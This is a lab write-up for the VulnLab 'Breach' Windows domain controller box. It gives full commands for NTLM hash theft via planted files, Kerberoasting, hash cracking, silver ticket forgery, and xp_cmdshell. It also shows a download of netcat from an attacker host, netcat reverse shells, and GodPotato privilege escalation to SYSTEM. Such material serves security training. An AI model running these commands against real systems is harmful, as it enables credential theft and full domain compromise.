Post

VulnLab Breach

VulnLab Breach

Posted
Preview Image
By 0x13hrafnulf
9 min read
VulnLab Breach

Breach

Recon

1
2

└─$ rustscan -g -a 10.10.64.112 -r 1-65535
10.10.64.112 -> [53,80,88,135,139,389,445,464,593,636,3269,3268,3389,1433,5985,9389,49664,49667,49670]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80

└─$ nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3269,3268,3389,1433,5985,9389,49664,49667,49670 10.10.64.112
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 19:25 +05
Nmap scan report for 10.10.64.112
Host is up (0.089s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-18 14:23:50Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-12-18T14:25:20+00:00; -1m17s from scanner time.
| ms-sql-info: 
|   10.10.64.112:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.64.112:1433: 
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-18T14:05:58
|_Not valid after:  2054-12-18T14:05:58
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-18T14:25:19+00:00; -1m18s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-18T14:24:40+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2024-12-17T14:05:12
|_Not valid after:  2025-06-18T14:05:12
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1m17s, deviation: 0s, median: -1m17s
| smb2-time: 
|   date: 2024-12-18T14:24:40
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.13 seconds

User

Starting with SMB enumeration, we found that we have write privileges on share

1
2
3
4
5
6
7
8
9
10
11
12
13

└─$ nxc smb 10.10.64.112 -u 'guest' -p '' --shares
SMB         10.10.64.112    445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.112    445    BREACHDC         [+] breach.vl\guest: 
SMB         10.10.64.112    445    BREACHDC         [*] Enumerated shares
SMB         10.10.64.112    445    BREACHDC         Share           Permissions     Remark
SMB         10.10.64.112    445    BREACHDC         -----           -----------     ------
SMB         10.10.64.112    445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.10.64.112    445    BREACHDC         C$                              Default share
SMB         10.10.64.112    445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.10.64.112    445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.10.64.112    445    BREACHDC         share           READ,WRITE      
SMB         10.10.64.112    445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.10.64.112    445    BREACHDC         Users           READ

Let’s check the content of the share. There are multiple directories, but nothing interesting.

1
2
3
4
5
6
7
8
9
10
11
12

└─$ smbclient //10.10.64.112/share -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Dec 18 19:26:26 2024
  ..                                DHS        0  Thu Feb 17 21:38:00 2022
  finance                             D        0  Thu Feb 17 17:19:34 2022
  software                            D        0  Thu Feb 17 17:19:12 2022
  transfer                            D        0  Thu Feb 17 20:00:35 2022

                7863807 blocks of size 4096. 2620167 blocks available
smb: \>

Since we have write privileges, we can try placing malicious file to perform NTLM theft. Let’s use ntlm-theft

1

└─$ python ~/tools/red-team/ntlm_theft/ntlm_theft.py --generate all --server 10.8.4.147 --filename breach

We can place multiple files (bad opsec) and spawn responder. We have to place them in transfer directory, since it contains users’ directories

1
2
3
4
5
6
7
8
9

smb: \transfer\> ls
  .                                   D        0  Thu Feb 17 20:00:35 2022
  ..                                  D        0  Wed Dec 18 19:58:39 2024
  claire.pope                         D        0  Thu Feb 17 17:21:35 2022
  diana.pope                          D        0  Thu Feb 17 17:21:19 2022
  julia.wong                          D        0  Thu Feb 17 17:24:39 2022

                7863807 blocks of size 4096. 2872078 blocks available
smb: \transfer\> 

1
2
3

smb: \transfer\> put breach.lnk 
putting file breach.lnk as \transfer\breach.lnk (7.8 kb/s) (average 5.0 kb/s)
smb: \transfer\> 

1
2
3
4
5

└─$ sudo responder -I tun0
<SNIP>
[SMB] NTLMv2-SSP Client   : 10.10.64.112
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:9094dd43abd42fab:A00409B14B45FF14FB85FABFD604F00E:01010000000000000088972D8451DB01987C80DF043380740000000002000800550050003300590001001E00570049004E002D0039005A004F003100490045005500480057005400330004003400570049004E002D0039005A004F00310049004500550048005700540033002E0055005000330059002E004C004F00430041004C000300140055005000330059002E004C004F00430041004C000500140055005000330059002E004C004F00430041004C00070008000088972D8451DB01060004000200000008003000300000000000000001000000002000007E8D2E578519DB125CEE6C026C422850E0D74FEB7C693A3220335FBE93F4A37B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0034002E003100340037000000000000000000

We managed to capture hash, so let’s crack it

1
2
3
4
5

└─$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt   
hashcat (v6.2.6) starting
<SNIP>
JULIA.WONG::BREACH:9094dd43abd42fab:a00409b14b45ff14fb85fabfd604f00e:01010000000000000088972d8451db01987c80df043380740000000002000800550050003300590001001e00570049004e002d0039005a004f003100490045005500480057005400330004003400570049004e002d0039005a004f00310049004500550048005700540033002e0055005000330059002e004c004f00430041004c000300140055005000330059002e004c004f00430041004c000500140055005000330059002e004c004f00430041004c00070008000088972d8451db01060004000200000008003000300000000000000001000000002000007e8d2e578519db125cee6c026c422850e0d74feb7c693a3220335fbe93f4a37b0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0034002e003100340037000000000000000000:<REDACTED>
<SNIP>

Creds work

1
2
3

└─$ nxc smb 10.10.64.112 -u 'julia.wong' -p '<REDACTED>'                             
SMB         10.10.64.112    445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.112    445    BREACHDC         [+] breach.vl\julia.wong:<REDACTED>

Let’s continue our enumeration. Let’s run bloodhound

1
2
3
4

└─$ bloodhound-python -d 'breach.vl' -u 'julia.wong' -p '<REDACTED>' -c all -ns 10.10.64.112 --zip  
INFO: Found AD domain: breach.vl
INFO: Getting TGT for user
<SNIP>

We find Kerberoastable user MSSQLSvc, which seems to be running on target’s port 1433

Which could’ve been also found if we started with running GetUserSPNs

1
2
3
4
5
6
7
8
9
10
11
12

└─$ impacket-GetUserSPNs breach.vl/'julia.wong':'<REDACTED>' -dc-ip 10.10.64.112 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 16:43:08.106169  2024-12-18 19:05:50.147346             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$b5d0e8cd536d9cdd64be6228c9c4eecf$ba5b9f63c7dc6838824a9e310704c1ab6cddba38461f7db8079c3882fd0a48554e6af7966f4928bcdf3e30f2c4e0b8796a65602a5d16ac5b9780d18967d0f64aa0041e5cf84a131cda93cb0a65cf5e3ef9a4df374ba9e8c1d1378939bf1c3a02051c908fc725f5b928334319eeae1cd252884c7b5bcb65e8536c43263b462c1fcde42700c914814bf856916d3627a83c83fe0966d15f6c01860d1ae367173c81761d6f7e0c012f7aaf51814a59276d4131e4b69721ead7ec83032aca0a168cb924a594cd1b7b3ebfa66c5f1b998536fcac7f8cb19651be94c54077b8d77d793c8e7e24bba1ea7118e6605355aa4aee4ff868205b6c3c80707da1ebc7243890c7ee99f4dc21537562be1d49bcfa0a66381b1494382f0b5ca8cab65398705d15574f05c96efeb9545aaed568902e13392372ffd6c8f5d7e088f76c79cf9e8b933854a0d64d9c8bd6f4b7dd03211081e1e38155667e2292f593154ddac5cf4b199bcd63991bf91c16b0f0f742a120e96aafe73d0496ab168ac194d56660ca2d2e0fa7c5a37ccd3db902ff80b36947e3b4a7c70f2a54a1bcf680646b9f85e8dbbc2b8bedfa5552091a29eb4b253930d9369e68072a853e225e023ca5302343cf604d12f9758767b1bc0d3636fe93e76e85231c4ba69b7cd01ab8e904a8493fccd4c32f2e76771a5779bfa6f99415d481b10bfdeb18bb9aed752a50dda42397afa6cfd64c496309d6008aafb7ec048554a8fc12a137163890f4dc8823c67f99f2fd871d379e1cd8e5e77e10467e47ef773ba843b478a9805717b2d25f5b5fa2f7731c3d460c85f4a7b1fddea90aebe11417eb1f129fabd3cd9a7259d252cf45db56e09b183c064885a41e9162ee694f386d72b265369ef8c2868c86e95e8fa38bdf0554399f845f76e15f35bb16d9a979e678a34688665b7bc396893eab3c8797f4569ccba95f73fbaa2aa857689da78e16ad9c0a7cc102a46f02d6f1dab6c70853bbd1e578870fb2565d603336ed75385458dfab60f3cd0a375d973c7ed76f0156c3c373995ccd7bfa27be6ff27639f94707f80486f5c5cb2a56d2c769f2f46e34e79cb14eb5620048176491fd6b1f05793b1aace699090d3706e4bd6a9ed495f560b55839ed5e3d1b0844e4b0a2dbdf656e41531f5d5f2d7e510799c0efb8abb1d9bd25680e35476f18e7e3baa33cd98adefd98173616a890f33852244b6f638d4a98fb33a9fafd2a03d49bce10690c764ab71ad05b4bfc1fdac16be8034c1d438ec350608aa5682a016d2c03e6b93c5cdd5c544550eda1a52c530bc852103e57b0600d93fbffe7eb8ee0ae7863afedbf72da8a6a4a714319db7f5e66ff9105cf884d5dba1b3d6a829e58a4f8178b2d48f213c1faf50e4b0506af876fa17664697323bb319ccd39ca6379b490eab920e256dc01238aece0dfa3826ad512a2ec43276fd98fbb8af473a9eb1f59d003caa7c629384baa

Let’s crack the hash

1
2
3
4
5

└─$ hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$b5d0e8cd536d9cdd64be6228c9c4eecf$ba5b9f63c7dc6838824a9e310704c1ab6cddba38461f7db8079c3882fd0a48554e6af7966f4928bcdf3e30f2c4e0b8796a65602a5d16ac5b9780d18967d0f64aa0041e5cf84a131cda93cb0a65cf5e3ef9a4df374ba9e8c1d1378939bf1c3a02051c908fc725f5b928334319eeae1cd252884c7b5bcb65e8536c43263b462c1fcde42700c914814bf856916d3627a83c83fe0966d15f6c01860d1ae367173c81761d6f7e0c012f7aaf51814a59276d4131e4b69721ead7ec83032aca0a168cb924a594cd1b7b3ebfa66c5f1b998536fcac7f8cb19651be94c54077b8d77d793c8e7e24bba1ea7118e6605355aa4aee4ff868205b6c3c80707da1ebc7243890c7ee99f4dc21537562be1d49bcfa0a66381b1494382f0b5ca8cab65398705d15574f05c96efeb9545aaed568902e13392372ffd6c8f5d7e088f76c79cf9e8b933854a0d64d9c8bd6f4b7dd03211081e1e38155667e2292f593154ddac5cf4b199bcd63991bf91c16b0f0f742a120e96aafe73d0496ab168ac194d56660ca2d2e0fa7c5a37ccd3db902ff80b36947e3b4a7c70f2a54a1bcf680646b9f85e8dbbc2b8bedfa5552091a29eb4b253930d9369e68072a853e225e023ca5302343cf604d12f9758767b1bc0d3636fe93e76e85231c4ba69b7cd01ab8e904a8493fccd4c32f2e76771a5779bfa6f99415d481b10bfdeb18bb9aed752a50dda42397afa6cfd64c496309d6008aafb7ec048554a8fc12a137163890f4dc8823c67f99f2fd871d379e1cd8e5e77e10467e47ef773ba843b478a9805717b2d25f5b5fa2f7731c3d460c85f4a7b1fddea90aebe11417eb1f129fabd3cd9a7259d252cf45db56e09b183c064885a41e9162ee694f386d72b265369ef8c2868c86e95e8fa38bdf0554399f845f76e15f35bb16d9a979e678a34688665b7bc396893eab3c8797f4569ccba95f73fbaa2aa857689da78e16ad9c0a7cc102a46f02d6f1dab6c70853bbd1e578870fb2565d603336ed75385458dfab60f3cd0a375d973c7ed76f0156c3c373995ccd7bfa27be6ff27639f94707f80486f5c5cb2a56d2c769f2f46e34e79cb14eb5620048176491fd6b1f05793b1aace699090d3706e4bd6a9ed495f560b55839ed5e3d1b0844e4b0a2dbdf656e41531f5d5f2d7e510799c0efb8abb1d9bd25680e35476f18e7e3baa33cd98adefd98173616a890f33852244b6f638d4a98fb33a9fafd2a03d49bce10690c764ab71ad05b4bfc1fdac16be8034c1d438ec350608aa5682a016d2c03e6b93c5cdd5c544550eda1a52c530bc852103e57b0600d93fbffe7eb8ee0ae7863afedbf72da8a6a4a714319db7f5e66ff9105cf884d5dba1b3d6a829e58a4f8178b2d48f213c1faf50e4b0506af876fa17664697323bb319ccd39ca6379b490eab920e256dc01238aece0dfa3826ad512a2ec43276fd98fbb8af473a9eb1f59d003caa7c629384baa:<REDACTED>
<SNIP>

Using found creds with mssqlclient has not results. But since we have the creds, we can issue Silver tickets. We need few things to perform this attack:

  • NTLM Hash
  • Domain SID <= S-1-5-21-2330692793-3312915120-706255856 (From bloodhound)
  • Name of the user for impersonation <= Administrator@breach.vl
  • SPN of the service <= mssql/breachdc.breach.vl:1433

To generate NTLM hash we can use any online service or convert it ourselves

1
2

└─$ iconv -f ASCII -t UTF-16LE <(printf "<REDACTED>") | openssl dgst -md4
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c

Now we have everything to create a silver ticket

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

└─$ ticketer.py -nthash '69596c7aa1e8daee17f8e78870e25a5c' -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.10.64.112 -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

Let’s test

1
2
3
4
5
6
7
8
9
10
11
12

└─$ KRB5CCNAME=administrator.ccache mssqlclient.py -k -no-pass breachdc.breach.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)>

Let’s check if we can enable command execution

1
2
3
4

SQL (BREACH\Administrator  dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)>

1
2
3
4
5
6
7
8

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell whoami
output             
----------------   
breach\svc_mssql   

NULL               

SQL (BREACH\Administrator  dbo@master)>

Let’s get reverse shell. Note that there’s AV on, so if we use C2 we have obfuscate our beacons (Will try this later, maybe will create own staging loader). Or we can use netcat

1
2
3
4

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell "powershell -c iwr -uri http://10.8.4.147:8000/nc64.exe -o c:\programdata\nc.exe"
output   
------   
NULL 

1
2

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell "c:\programdata\nc.exe 10.8.4.147 9000 -e cmd"

We got shell

1
2
3
4
5
6
7

└─$ rlwrap nc -lvnp 9000                  
listening on [any] 9000 ...
connect to [10.8.4.147] from (UNKNOWN) [10.10.64.112] 62586
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Root

To root this box we can abuse SeImpersonatePrivilege and run GodPotato.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell "whoami /priv"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               

PRIVILEGES INFORMATION                                                             

----------------------                                                             

NULL                                                                               

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   

SeMachineAccountPrivilege     Add workstations to domain                Disabled   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Run GodPotato and receive the shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

C:\ProgramData>.\gp.exe -cmd "cmd.exe /c c:\programdata\nc.exe 10.8.4.147 6666 -e cmd"
.\gp.exe -cmd "cmd.exe /c c:\programdata\nc.exe 10.8.4.147 6666 -e cmd"
[*] CombaseModule: 0x140707809263616
[*] DispatchTable: 0x140707811854200
[*] UseProtseqFunction: 0x140707811146544
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\82718190-3bde-448d-ab56-be9e95db374b\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004802-1530-ffff-93b4-469f47bd5505
[*] DCOM obj OXID: 0xefbd042ef152569
[*] DCOM obj OID: 0xad5dd8b6483abfd4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 1016 Token:0x264  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5748

1
2
3
4
5
6
7
8
9

└─$ rlwrap nc -lvnp 6666                                                               
listening on [any] 6666 ...
connect to [10.8.4.147] from (UNKNOWN) [10.10.64.112] 62703
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\ProgramData>whoami
whoami
nt authority\system

https://api.vulnlab.com/api/v1/share?id=cc5cb66d-c3ba-43d5-bf4a-80455f3de4b2

VulnLab Boxes, Active Directory
vulnlab-boxes active-directory
This post is licensed under CC BY 4.0 by the author.